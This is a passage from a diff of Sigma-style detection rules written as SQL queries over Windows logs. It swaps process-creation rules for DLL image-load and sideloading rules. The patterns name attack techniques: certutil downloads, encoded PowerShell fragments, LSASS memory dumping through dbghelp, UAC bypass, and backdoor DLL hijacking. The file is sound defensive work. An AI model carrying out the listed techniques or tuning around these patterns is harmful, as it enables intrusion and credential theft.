ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "CMD Shell Output Redirect", - "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", + "title": "Potential Libvlc.DLL Sideloading", + "id": "bf9808c4-d24f-44a2-8398-b65227d406b6", "status": "experimental", - "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", - "author": "frack113", + "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", + "author": "X__Junior", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", 
+ "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" + "False positives are expected if VLC is installed in non-default locations" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\libvlc.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\VideoLAN\\\\VLC\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_redirect.yml" + "filename": "image_load_side_load_libvlc.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "status": "test", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "DotNET Assembly DLL Loaded Via Office Application", + "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "status": "test", + "description": "Detects any assembly DLL being loaded by an Office Product", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "Indirect Command Execution By Program Compatibility Wizard", - "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "author": "A. 
Sungurov , oscd.community", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "status": "test", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' 
OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": 
"image_load_office_dsparse_dll_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "status": "experimental", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + ], + "filename": "image_load_malware_foggyweb_nobelium.yml" + }, + { + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR 
((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' 
ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "New Service Creation Using Sc.EXE", - "id": "85ff530b-261d-48c6-a441-facaa2e81e48", - "status": "test", - "description": "Detects the creation of a new service using the \"sc.exe\" utility.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ + "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded 
LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_create_service.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR 
ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine 